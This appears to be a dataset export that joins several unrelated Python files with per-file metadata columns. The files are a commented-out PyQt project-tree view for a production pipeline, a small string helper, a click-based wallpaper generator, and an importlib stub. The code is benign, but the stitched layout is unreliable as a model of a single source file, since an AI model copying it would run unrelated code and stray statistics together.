# if item.typeInfo() == cfg._folder_ or item.typeInfo() == cfg._asset_:
# event.setDropAction(QtCore.Qt.IgnoreAction)
# event.ignore()
# return
#
# '''
# this is to make sure the dropped item is not already a child in the downstream of branches
# '''
# descending_id = []
# for i in self.sourceModel.listHierarchy(item_index):
# descending_id.append(self.sourceModel.getNode(i).id)
#
# if model_id in descending_id:
#
# event.setDropAction(QtCore.Qt.IgnoreAction)
# event.ignore()
# return
#
# else:
#
# source.clearModel()
# self.sourceModel.removeRows(item_index.row(), 1, item_parent)
# self._proxyModel.invalidate()
#
# self.sourceModel.dropMimeData(mime, event.dropAction, 0, 0, model_index)
# source.restoreTreeViewtSelection()
# return
#
# # this was required when i misused the insert rows function of the model...
# # self._proxyModel.invalidate()
#
# '''
# here i am detecting if a drop is coming from the contents view, to mark it as acepted, otherwise the drop will be blocked.
# it's UGLY, but for now it's the only way i can make this work...
# '''
#
# def dragEnterEvent(self, event):
#
# super(Project_Tree_View, self).dragEnterEvent(event)
#
# if event.source().__class__.__name__ == 'PipelineContentsView':
# return event.setAccepted(True)
#
# '''
# def dragMoveEvent(self, event):
#
# super(pipelineTreeView,self).dragMoveEvent(event)
# #return event.setAccepted(True)
# '''
#
# def projectRootIndex(self):
# modelRootIndex = self.asModelIndex(self.rootIndex())
# return modelRootIndex
# # get the first childe of the model's root
# # return self.sourceModel.index(0,0,modelRootIndex)
#
# # def mouseReleaseEvent(self, event):
# #
# # super(pipelineTreeView, self).mouseReleaseEvent(event)
# # self.saveSelection()
# # #self.tableView.update(self.selectionModel().selection())
# # event.accept
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node and not node._deathrow:
#
# if node.typeInfo() != cfg._stage_:
#
# level_name, level_type = node.level_options
#
# if node.typeInfo() == cfg._root_:
# actions.append(QtWidgets.QAction("Create tree...", menu,
# triggered=functools.partial(self.create_new_tree, src)))
#
# if level_type == cfg._folder_:
# actions.append(
# QtWidgets.QAction("Create new {0}".format(level_name), menu,
# triggered=functools.partial(self.create_new_folder, src, level_name)))
#
# elif level_type == cfg._asset_:
# actions.append(QtWidgets.QAction("Create new {0}".format(level_name), menu,
# triggered=functools.partial(self.create_new_asset, src, level_name)))
#
# elif level_type == cfg._stage_:
# actions.append(QtWidgets.QAction("Create new {0}".format(level_name), menu,
# triggered=functools.partial(self.create_new_stage, src)))
#
# elif node.typeInfo() == cfg._asset_:
# actions.append(QtWidgets.QAction("Create new %s" % (cfg._stage_), menu,
# triggered=functools.partial(self.create_new_stage, src)))
#
# if not node.typeInfo() == cfg._root_:
# actions.append(QtWidgets.QAction("Delete", menu, triggered=functools.partial(self.delete, src)))
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
#
# '''
# functions to add/remove tree nodes
# this is we will want some user input...
#
# '''
#
# def explore(self, index):
# node = self.asModelNode(index)
# node.explore()
#
# def delete(self, index):
# # clear the table view
# # self.tableView.update(QtWidgets.QItemSelection())
#
# node = self.asModelNode(index)
# node.deathrow()
# # parentIndex = self.sourceModel.parent(index)
# # self.sourceModel.removeRows(node.row(),1,parentIndex, kill=True)
# self._proxyModel.invalidate()
# #
# # self.updateTable( self.fromProxyIndex(parentIndex))
# self.update_view.emit()
# return True
#
# def create_new_tree(self, parent):
# global counter
# global total_items
# counter = 0
# total_items = 0
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# def rec(items, p, stages, name_format):
#
# global counter
# global total_items
# """ recursive function for generating a tree out of the instructions list called items
# the function creates nodes by instruction in the first item in the list, then while the list is longer then 1,
# it sends the list againg but without the current item
# the parent is the currently created node"""
# times = items[0][2]
# start = items[0][3]
# name = items[0][1]
# padding = items[0][4]
#
# for i in range(times):
# base_folder_name = name
#
# number = files.set_padding(start + i, padding)
# if base_folder_name != "":
# folder_name = "{0}{1}".format(base_folder_name, number) if padding > 1 else base_folder_name
# else:
# folder_name = "{0}".format(number) if times > 1 else "unnamed_folder"
#
# skip = False
# for child in p.children:
# if child.name == folder_name:
# skip = True
# if skip:
# print "folder exists!"
# continue
#
# i = self.sourceModel.indexFromNode(p, QtCore.QModelIndex())
# depth_list = self.sourceModel.listAncestos(i)
#
# path = os.path.join(p.path, folder_name)
#
# if len(items) == 1:
# node = assets.AssetNode(folder_name, path=path, parent=p, virtual=True,
# section=p.section)
#
# self.sourceModel.insertRows(0, 0, parent=i, node=node)
# self._proxyModel.invalidate()
# counter += 1
# # QtWidgets.QApplication.processEvents()
# # #print remap(current, 0, total_items, 0, 100)
# # self.percentage_complete.emit(remap(current, 0, total_items, 0, 100))
#
# '''for an asset, generate stages:'''
#
# new_index = self.sourceModel.indexFromNode(node, QtCore.QModelIndex())
# for s in stages:
# if stages[s]:
# path = os.path.join(p.path, folder_name, s)
# # formatDepth
# stageNode = pipeline.libs.nodes.stages.StageNode(s, parent=node, path=path, virtual=True,
# name_format=name_format, section=p.section,
# project=self.pipelineUI.project, depth=len(depth_list))
# # if node is not False:
# self._sourceModel.insertRows(0, 0, parent=new_index, node=stageNode)
# self._proxyModel.invalidate()
# # counter += 1
# # QtWidgets.QApplication.processEvents()
# # #print remap(current, 0, total_items, 0, 100)
# # self.percentage_complete.emit(remap(current, 0, total_items, 0, 100))
#
# else:
# node = dt.FolderNode(folder_name, path=path, parent=p, virtual=True,
# section=p.section, project=self.pipelineUI.project,
# depth=len(depth_list))
#
# self.sourceModel.insertRows(0, 0, parent=i, node=node)
# self._proxyModel.invalidate()
# counter += 1
#
# if len(items) > 1:
#
# QtWidgets.QApplication.processEvents()
#
# # print remap_value(counter, 0, total_items, 0, 100), "--->", counter, "--->", total_items
# self.percentage_complete.emit(misc.remap_value(counter, 0, total_items, 0, 100))
# l = list(items[1:])
# rec(l, node, stages, name_format)
# else:
# pass
#
# folderDlg = outliner.newTreeDialog(project=self.pipelineUI.project, section=parent_node.section)
# result = folderDlg.exec_()
# res = folderDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# levels = res["levels"]
#
# total_current_level = levels[0][2]
# total_items = total_current_level
#
# for i in range(1, len(levels)):
# total_current_level = (total_current_level * levels[i][2])
# total_items += total_current_level
#
# rec(levels, parent_node, res["stages"], res["name_format"])
# self.update_view.emit()
# self.percentage_complete.emit(0)
#
# def create_new_folder(self, parent, string):
#
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# folderDlg = outliner.newFolderDialog(string=string)
# result = folderDlg.exec_()
# res = folderDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# base_folder_name = res["name"]
#
# for i in range(0, res["quantity"]):
# QtWidgets.QApplication.processEvents()
# self.percentage_complete.emit(misc.remap_value(i, 0, res["quantity"], 0, 100))
#
# number = files.set_padding(res["from"] + i, res["padding"])
# if base_folder_name != "":
# folder_name = "{0}{1}".format(base_folder_name, number) if res["padding"] > 0 else base_folder_name
# else:
# folder_name = "{0}".format(number) if res["quantity"] > 1 else "unnamed_folder"
#
# skip = False
# for child in parent_node.children:
# if child.name == folder_name:
# skip = True
# if skip:
# print "folder exists!"
# continue
#
# path = os.path.join(parent_node.path, folder_name)
# node = dt.FolderNode(folder_name, path=path, parent=parent_node, virtual=True,
# section=parent_node.section, project=self.pipelineUI.project, depth=len(ancestors))
#
# self.sourceModel.insertRows(0, 0, parent=parent, node=node)
# self._proxyModel.invalidate()
#
# self.update_view.emit()
# self.percentage_complete.emit(0)
#
# def create_new_asset(self, parent, string):
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# assetDlg = outliner.newAssetDialog(stages=self.pipelineUI.project.stages[parent_node.section], ancestors=ancestors,
# string=string, project=self.pipelineUI.project)
# result = assetDlg.exec_()
# res = assetDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# base_folder_name = res["name"]
# for i in range(0, res["quantity"]):
# QtWidgets.QApplication.processEvents()
# self.percentage_complete.emit(misc.remap_value(i, 0, res["quantity"], 0, 100))
# number = files.set_padding(res["from"] + i, res["padding"])
# if base_folder_name != "":
# folder_name = "{0}{1}".format(base_folder_name, number) if res["padding"] > 1 else base_folder_name
# else:
# folder_name = "{0}".format(number) if res["quantity"] > 1 else "unnamed_folder"
#
# skip = False
# for child in parent_node.children:
# if child.name == folder_name:
# skip = True
# if skip:
# print "folder exists!"
# continue
#
# path = os.path.join(parent_node.path, folder_name)
# node = assets.AssetNode(folder_name, path=path, parent=parent_node, virtual=True,
# section=parent_node.section)
# # if node is not False:
# self.sourceModel.insertRows(0, 0, parent=parent, node=node)
# self._proxyModel.invalidate()
#
# new_index = self.sourceModel.indexFromNode(node, QtCore.QModelIndex())
# for s in res["stages"]:
# if res["stages"][s]:
# path = os.path.join(parent_node.path, folder_name, s)
# # formatDepth
# stageNode = pipeline.libs.nodes.stages.StageNode(s, parent=node, path=path, virtual=True,
# name_format=res["name_format"], section=parent_node.section,
# project=self.pipelineUI.project, depth=len(ancestors))
# # if node is not False:
# self._sourceModel.insertRows(0, 0, parent=new_index, node=stageNode)
# self._proxyModel.invalidate()
#
# self.update_view.emit()
# self.percentage_complete.emit(0)
#
# def create_new_stage(self, parent):
#
# parent_node = self.sourceModel.getNode(parent)
#
# depth_list = self.sourceModel.listAncestos(parent)
# ancestors = []
# for i in depth_list:
# ancestors.append(self.sourceModel.getNode(i))
#
# new_stages = []
# for stage in self.pipelineUI.project.stages[parent_node.section]:
# if stage not in parent_node.stages:
# new_stages.append(stage)
#
# if new_stages:
#
# assetDlg = outliner.newStageDialog(parent_name=parent_node.name, stages=new_stages, ancestors=ancestors,
# project=self.pipelineUI.project)
# result = assetDlg.exec_()
# res = assetDlg.result()
# if result == QtWidgets.QDialog.Accepted:
# for s in res["stages"]:
# if res["stages"][s]:
# path = os.path.join(parent_node.path, s)
# # formatDepth
#
# stageNode = pipeline.libs.nodes.stages.StageNode(s, parent=parent_node, asset_name=parent_node.name, path=path,
# virtual=True, name_format=res["name_format"],
# section=parent_node.section, settings=self.pipelineUI.settings)
# # if node is not False:
# self._sourceModel.insertRows(0, 0, parent=parent, node=stageNode)
# self._proxyModel.invalidate()
#
# self.update_view.emit()
#
# @property
# def tree_as_flat_list(self):
# return self._tree_as_flat_list
#
# @tree_as_flat_list.setter
# def tree_as_flat_list(self, list):
# self._tree_as_flat_list = list
#
# def list_flat_hierarchy(self):
#
# list = []
# for i in self.sourceModel.listHierarchy(QtCore.QModelIndex()):
# list.append(self.sourceModel.getNode(i))
#
# self.tree_as_flat_list = list
#
# def filterContents(self):
#
# if self.tree_as_flat_list:
# # self.tableView.clearModel()
#
# model = models.PipelineContentsModel(self.tree_as_flat_list)
# # self.tableView.populateTable(model)
#
# def commit(self):
# print "commit tree:"
# self.sourceModel.rootNode.commit()
# self.changed = False
#
# class Dresser_View(Project_Tree_View):
# def __init__(self, parent=None):
# super(Dresser_View, self).__init__(parent)
#
#
# def setModel(self, model):
#
# QtWidgets.QTreeView.setModel(self, model)
#
# # super(Dresser_View, self).setModel(model)
#
# if model:
# self.changed = False
#
# self.proxyModel = self.model()
# self.sourceModel = self.proxyModel.sourceModel()
#
# '''
# this will expend the tree only on the first level, which should be
# the projects name folder
# the rest will be collapsed
# '''
# self.initialExpension()
# '''
# save the expended state of the tree
# '''
# self.saveState()
#
# self.header().setStretchLastSection(False)
# QtCompat.setSectionResizeMode(self.header(), 0, QtWidgets.QHeaderView.Stretch)
#
#
# self.header().resizeSection(1, 100)
# QtCompat.setSectionResizeMode(self.header(), 1, QtWidgets.QHeaderView.Fixed)
#
#
# def initialExpension(self):
#
# if self.model():
# self.collapseAll()
# for row in range(self.model().rowCount(self.rootIndex())):
# x = self.model().index(row, 0, self.rootIndex())
# self.setExpanded(x, True)
#
# def contextMenuEvent(self, event):
#
# handled = True
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
# node = None
#
# if index.isValid():
# src = self.asModelIndex(index)
# node = self.asModelNode(src)
#
# actions = []
#
# if node:
#
# if node.typeInfo() == cfg._master_:
#
# actions.append(QtWidgets.QAction("Load", menu,
# triggered=functools.partial(self.load, src)))
#
# actions.append(QtWidgets.QAction("Reference to current", menu,
# triggered=functools.partial(self.reference_to_current, src)))
#
# actions.append(QtWidgets.QAction("Explore...", menu,
# triggered=functools.partial(self.explore, src)))
# else:
#
# event.accept()
# return
#
# else:
# event.accept()
# return
#
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept()
#
# return
#
# def explore(self, index):
# node = self.asModelNode(index)
# node.explore()
#
# def load(self, index):
# node = self.asModelNode(index)
# node.load()
#
# def reference_to_current(self, index):
# node = self.asModelNode(index)
# node.reference()
#
| 37.462792
| 190
| 0.591747
| 11,990
| 121,829
| 5.905922
| 0.071226
| 0.019347
| 0.040219
| 0.040671
| 0.823053
| 0.798311
| 0.768288
| 0.738293
| 0.72379
| 0.706462
| 0
| 0.00923
| 0.293009
| 121,829
| 3,251
| 191
| 37.474316
| 0.812903
| 0.458134
| 0
| 0.695958
| 0
| 0
| 0.021728
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.010545
| 0.019332
| null | null | 0.000879
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc8193f1052a432837102d0bf5580b838395d468
| 100
|
py
|
Python
|
BasicFunction.py
|
KinGitY/uhdl_core
|
40b335e11624d8ab40d8fe0772787e9bcec0b268
|
[
"MIT"
] | null | null | null |
BasicFunction.py
|
KinGitY/uhdl_core
|
40b335e11624d8ab40d8fe0772787e9bcec0b268
|
[
"MIT"
] | 1
|
2020-09-13T13:14:58.000Z
|
2020-09-13T13:24:24.000Z
|
BasicFunction.py
|
KinGitY/uhdl_core
|
40b335e11624d8ab40d8fe0772787e9bcec0b268
|
[
"MIT"
] | 1
|
2020-09-10T14:06:37.000Z
|
2020-09-10T14:06:37.000Z
|
def join_name(*args,join_str='_'):
return join_str.join([x for x in args if x is not None])
| 14.285714
| 60
| 0.66
| 20
| 100
| 3.1
| 0.65
| 0.225806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21
| 100
| 6
| 61
| 16.666667
| 0.78481
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d5f3ea0a34a6c0aa52a950f42cc4b8b40af1d7ee
| 16,213
|
py
|
Python
|
wallgen.py
|
pablorgr/wallgen
|
a5624fbbd962b4cae49dd4b1fac7064a86ef139a
|
[
"MIT"
] | null | null | null |
wallgen.py
|
pablorgr/wallgen
|
a5624fbbd962b4cae49dd4b1fac7064a86ef139a
|
[
"MIT"
] | null | null | null |
wallgen.py
|
pablorgr/wallgen
|
a5624fbbd962b4cae49dd4b1fac7064a86ef139a
|
[
"MIT"
] | null | null | null |
import sys
import time
import click
import numpy as np
from skimage import color
from tools.wallpaper import setwallpaper
from tools.points import (
genPoints,
genSmartPoints)
from tools.gradient import (
Image,
NbyNGradient,
nGradient,
random_gradient,
swirl_image)
from tools.shapes import (
drawSlants,
genDiamond,
genHexagon,
genIsometric,
genPoly,
genSquares,
genTriangle)
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.group(context_settings=CONTEXT_SETTINGS)
def cli():
pass
@cli.command()
@click.argument("side", type=click.INT, metavar="PIXELS")
@click.option("--colors", "-c", multiple=True, type=click.STRING,
metavar="#HEXCODE", help="Use many colors in a custom gradient")
@click.option("--points", "-p", default=100, metavar="no-of-points",
help="Number of points to use, default = 100")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
metavar="#HEXCODE", help="Outline the triangles")
@click.option("--name", "-n", metavar="/path/to/output_file",
help="Rename the output file")
@click.option("--only-color", "-oc", is_flag=True,
help="Generate just a gradient image")
@click.option("--use-nn", "-un", is_flag=True,
help="Use NbyNGradient function")
@click.option("--swirl", "-sw", type=click.INT, metavar="STRENGTH",
help="Swirl the gradient. [1-10]")
@click.option("--scale", "-sc", default=2,
help="""Scale image to do anti-aliasing. Default=2. scale=1 means
no antialiasing. [WARNING: Very memory expensive]""")
@click.option("--set-wall", "-w", is_flag=True,
help="Set the generated image as your Desktop wallpaper")
def poly(
side,
points,
show,
colors,
outline,
name,
only_color,
use_nn,
swirl,
scale,
set_wall):
""" Generates a HQ low poly image using a gradient """
error = ""
if side < 50:
error = "Image too small. Minimum size 50"
elif points < 3:
error = "Too less points. Minimum points 3"
elif points > 200000:
error = "Too many points. Maximum points 200000"
elif scale < 1:
error = "Invalid scale value"
if error:
click.secho(error, fg='red', err=True)
sys.exit(1)
side = side * scale # increase size to anti alias
shift = side // 10
nside = side + shift * 2 # increase size to prevent underflow
if colors:
if len(colors) < 2:
click.secho("One color gradient not possible.", fg="red", err=True)
sys.exit(1)
cs = [tuple(bytes.fromhex(c[1:])) for c in colors]
img = nGradient(nside, *cs)
else:
if use_nn:
points = 1000 if points < 1000 else points
img = NbyNGradient(nside)
else:
img = random_gradient(nside)
if swirl:
if only_color:
img = img.resize((side // scale, side // scale),
resample=Image.BICUBIC)
img = swirl_image(img, swirl)
if not only_color:
if outline:
try:
outline = tuple(bytes.fromhex(outline[1:]))
except Exception:
click.secho("Invalid color hex", fg='red', err=True)
sys.exit(1)
print("Preparing image", end="")
pts = genPoints(points, nside, nside)
print("\r", end="")
print("Generated points", end="")
img = genPoly(side, side, img, pts, shift, shift, outl=outline)
print("\r", end="")
print("Making final tweaks", end="")
img = img.resize((side // scale, side // scale),
resample=Image.BICUBIC)
if show:
img.show()
file_name = ""
if name:
file_name = "{}.png".format(name)
img.save(file_name)
else:
file_name = "wall-{}.png".format(int(time.time()))
img.save(file_name)
print("\r", end="")
print(f"Image is stored at {file_name}")
if set_wall:
msg, ret = setwallpaper(file_name)
if ret:
click.secho(msg, fg="green")
else:
click.secho(msg, fg="red")
@cli.command()
@click.argument("side", type=click.INT, metavar="PIXELS")
@click.option("--type",
"-t",
"shape",
metavar="[sq/hex/dia/tri/iso]",
type=click.Choice(['sq',
'hex',
'dia',
'tri',
'iso']),
help="""
Choose which shape to use.
[Square/Hexagons/Diamonds/Triangles/Isometric]
""")
@click.option("--colors", "-c", multiple=True, type=click.STRING,
metavar="#HEXCODE", help="Use many colors in a custom gradient")
@click.option("--percent", "-p", type=click.INT, metavar="1-10", default=1,
help="Use this percentage to determine number of polygons. [1-10]\
")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
metavar="#HEXCODE", help="Outline the shapes")
@click.option("--name", "-n", metavar="/path/to/output_file",
help="Rename the output file")
@click.option("--use-nn", "-un", is_flag=True,
help="Use NbyNGradient function")
@click.option("--swirl", "-sw", type=click.INT, metavar="STRENGTH",
help="Swirl the gradient. [1-10]")
@click.option("--scale", "-sc", default=2,
help="""Scale image to do anti-aliasing. Default=2. scale=1 means
no antialiasing. [WARNING: Very memory expensive]""")
@click.option("--set-wall", "-w", is_flag=True,
help="Set the generated image as your Desktop wallpaper")
def shape(
side,
shape,
colors,
show,
outline,
name,
percent,
use_nn,
swirl,
scale,
set_wall):
""" Generates a HQ image of a beautiful shapes """
error = ""
if side < 50:
error = "Image too small. Minimum size 50"
if percent is not None:
if percent < 1 or percent > 10:
error = "Error {} : Percent range 1-10".format(percent)
if error:
click.secho(error, fg='red', err=True)
sys.exit(1)
side = side * scale # increase size to anti alias
if colors:
if len(colors) < 2:
click.secho("One color gradient not possible.", fg="red", err=True)
sys.exit(1)
cs = [tuple(bytes.fromhex(c[1:])) for c in colors]
img = nGradient(side, *cs)
else:
if use_nn:
img = NbyNGradient(side)
else:
img = random_gradient(side)
if swirl:
img = swirl_image(img, swirl)
if outline:
try:
outline = tuple(bytes.fromhex(outline[1:]))
except Exception:
click.secho("Invalid color hex", fg='red', err=True)
sys.exit(1)
print("Preparing image", end="")
if shape == 'hex':
percent = percent if percent else 5
img = genHexagon(side, side, img, outline, per=(percent or 1))
elif shape == 'sq':
img = genSquares(side, side, img, outline, per=(percent or 1))
elif shape == 'dia':
img = genDiamond(side, side, img, outline, per=(percent or 1))
elif shape == 'tri':
img = genTriangle(side, side, img, outline, per=(percent or 1))
elif shape == 'iso':
img = genIsometric(side, side, img, outline, per=(percent or 1))
else:
error = """
No shape given. To see list of shapes \"wallgen shape --help\"
"""
click.secho(error, fg='red', err=True)
sys.exit(1)
print("\r", end="")
print("Making final tweaks", end="")
img = img.resize((side // scale, side // scale), resample=Image.BICUBIC)
if show:
img.show()
file_name = ""
if name:
file_name = "{}.png".format(name)
img.save(file_name)
else:
file_name = "wall-{}.png".format(int(time.time()))
img.save(file_name)
print("\r", end="")
print(f"Image is stored at {file_name}")
if set_wall:
msg, ret = setwallpaper(file_name)
if ret:
click.secho(msg, fg="green")
else:
click.secho(msg, fg="red")
@cli.command()
@click.argument("side", type=click.INT, metavar="PIXELS")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--name", "-n", help="Rename the output")
@click.option("--swirl", "-sw", type=click.INT, metavar="STRENGTH",
help="Swirl the gradient. [1-10]")
@click.option("--set-wall", "-w", is_flag=True,
help="Set the generated image as your Desktop wallpaper")
def slants(side, show, name, swirl, set_wall):
""" Generates slanting lines of various colors """
scale = 2
side = side * scale # increase size to anti alias
print("Preparing image", end="")
img = drawSlants(side)
print("\r", end="")
print("Making final tweaks", end="")
img = img.resize((side // scale, side // scale), resample=Image.BICUBIC)
if swirl:
img = swirl_image(img, swirl)
if show:
img.show()
file_name = ""
if name:
file_name = "{}.png".format(name)
img.save(file_name)
else:
file_name = "wall-{}.png".format(int(time.time()))
img.save(file_name)
print("\r", end="")
print(f"Image is stored at {file_name}")
if set_wall:
msg, ret = setwallpaper(file_name)
if ret:
click.secho(msg, fg="green")
else:
click.secho(msg, fg="red")
@cli.group()
def pic():
""" Use a picture instead of a gradient """
@pic.command()
@click.argument("image", type=click.Path(exists=True, dir_okay=False))
@click.option("--points", "-p", default=1000, metavar="no-of-points",
help="Number of points to use, default = 1000")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
metavar="#HEXCODE", help="Outline the triangles")
@click.option("--name", "-n", metavar="/path/to/output_file",
help="Rename the output file")
@click.option("--smart", "-sm", is_flag=True, help="Use smart points")
@click.option("--set-wall", "-w", is_flag=True,
help="Set the generated image as your Desktop wallpaper")
def poly(image, points, show, outline, name, smart, set_wall): # noqa: F811
""" Generates a HQ low poly image """
if points < 3:
error = "Too less points. Minimum points 3"
elif points > 200000:
error = "Too many points. Maximum points {}".format(200000)
else:
error = None
if error:
click.secho(error, fg='red', err=True)
sys.exit(1)
# wshift = img.width//10
# hshift = img.height//10
# width += wshift*1
# height += hshift*2
if outline:
try:
outline = tuple(bytes.fromhex(outline[1:]))
except Exception:
click.secho("Invalid color hex", fg='red', err=True)
sys.exit(1)
print("Preparing image", end="")
img = Image.open(image)
width = img.width
height = img.height
wshift = width // 100
hshift = height // 100
n_width = width + 2 * wshift
n_height = height + 2 * hshift
if smart:
# Sobel Edge
ski_img = np.array(img)
gray_img = color.rgb2gray(ski_img)
pts = genSmartPoints(gray_img)
else:
pts = genPoints(points, n_width, n_height)
print("\r", end="")
print("Generated points", end="")
final_img = genPoly(img.width, img.height, img, pts,
wshift, hshift, outline, pic=True)
print("\r", end="")
print("Making final tweaks", end="")
if show:
final_img.show()
file_name = ""
if name:
file_name = "{}.png".format(name)
final_img.save(file_name)
else:
file_name = "wall-{}.png".format(int(time.time()))
final_img.save(file_name)
print("\r", end="")
print(f"Image is stored at {file_name}")
if set_wall:
msg, ret = setwallpaper(file_name)
if ret:
click.secho(msg, fg="green")
else:
click.secho(msg, fg="red")
@pic.command()
@click.argument("image", type=click.Path(exists=True, dir_okay=False))
@click.option("--type",
"-t",
"shape",
type=click.Choice(['sq',
'hex',
'dia',
'tri',
'iso']),
metavar="[sq/hex/dia/tri/iso]",
help="""
Choose which shape to use.
[Square/Hexagons/Diamonds/Triangles/Isometric]
""")
@click.option("--percent", "-p", type=click.INT, metavar="1-10",
help="""
Use this percentage to determine number of polygons. [1-10]
""")
@click.option("--show", "-s", is_flag=True, help="Open the image")
@click.option("--outline", "-o", default=None,
metavar="#HEXCODE", help="Outline the shapes")
@click.option("--name",
"-n",
metavar="/path/to/output_file",
help="Rename the output")
@click.option("--set-wall", "-w", is_flag=True,
help="Set the generated image as your Desktop wallpaper")
def shape(image, shape, show, outline, name, percent, set_wall): # noqa: F811
""" Generate a HQ image of a beautiful shapes """
error = None
if percent:
if percent < 1 or percent > 10:
error = "Percent range 1-10"
if error:
click.secho(error, fg='red', err=True)
sys.exit(1)
img = Image.open(image)
width = img.width
height = img.height
if outline:
try:
outline = tuple(bytes.fromhex(outline[1:]))
except Exception:
click.secho("Invalid color hex", fg='red', err=True)
sys.exit(1)
print("Preparing image", end="")
if shape == 'hex':
percent = percent if percent else 5
img = genHexagon(width, height, img, outline, pic=True, per=percent)
elif shape == 'sq':
img = genSquares(width, height, img, outline, pic=True, per=percent)
elif shape == 'dia':
img = genDiamond(width, height, img, outline, pic=True, per=percent)
elif shape == 'tri':
img = genTriangle(width, height, img, outline, pic=True, per=percent)
elif shape == 'iso':
img = genIsometric(width, height, img, outline, pic=True, per=percent)
else:
error = """
No shape given. To see list of shapes \"wallgen pic shape --help\"
"""
click.secho(error, fg='red', err=True)
sys.exit(1)
print("\r", end="")
print("Making final tweaks", end="")
if show:
img.show()
file_name = ""
if name:
file_name = "{}.png".format(name)
img.save(file_name)
else:
file_name = "wall-{}.png".format(int(time.time()))
img.save(file_name)
print("\r", end="")
print(f"Image is stored at {file_name}")
if set_wall:
msg, ret = setwallpaper(file_name)
if ret:
click.secho(msg, fg="green")
else:
click.secho(msg, fg="red")
if __name__ == "__main__":
cli()
| 31.299228
| 81
| 0.533461
| 1,943
| 16,213
| 4.397838
| 0.118888
| 0.046343
| 0.017554
| 0.022937
| 0.819193
| 0.784903
| 0.772499
| 0.758923
| 0.728847
| 0.720889
| 0
| 0.013694
| 0.319867
| 16,213
| 517
| 82
| 31.359768
| 0.761222
| 0.029791
| 0
| 0.750588
| 0
| 0
| 0.210273
| 0.006066
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016471
| false
| 0.002353
| 0.021176
| 0
| 0.037647
| 0.068235
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
91270810635f98543f35ed255b4d392e6dd566c6
| 127
|
py
|
Python
|
exp.py
|
HuakunShen/cron-crawler-template
|
00993b2edbb02dc945450969afba3a8b8aaa9fb0
|
[
"MIT"
] | null | null | null |
exp.py
|
HuakunShen/cron-crawler-template
|
00993b2edbb02dc945450969afba3a8b8aaa9fb0
|
[
"MIT"
] | 2
|
2022-03-18T16:45:21.000Z
|
2022-03-18T16:45:49.000Z
|
exp.py
|
HuakunShen/cron-crawler-template
|
00993b2edbb02dc945450969afba3a8b8aaa9fb0
|
[
"MIT"
] | null | null | null |
import importlib
# mod = importlib.import_module("jobs.worldtime")
# print(hasattr(mod, "Job"))
# print(hasattr(mod, "Jobs"))
| 21.166667
| 49
| 0.708661
| 16
| 127
| 5.5625
| 0.5625
| 0.269663
| 0.337079
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102362
| 127
| 5
| 50
| 25.4
| 0.780702
| 0.80315
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e66fa03db66689d698cec4c68ffb2345dad152b4
| 229
|
py
|
Python
|
tests/mocks/__init__.py
|
Informasjonsforvaltning/fdk-model-publisher
|
f9f2434436fbbc4e66a9747d8fb2b7f07bb76533
|
[
"Apache-2.0"
] | null | null | null |
tests/mocks/__init__.py
|
Informasjonsforvaltning/fdk-model-publisher
|
f9f2434436fbbc4e66a9747d8fb2b7f07bb76533
|
[
"Apache-2.0"
] | 34
|
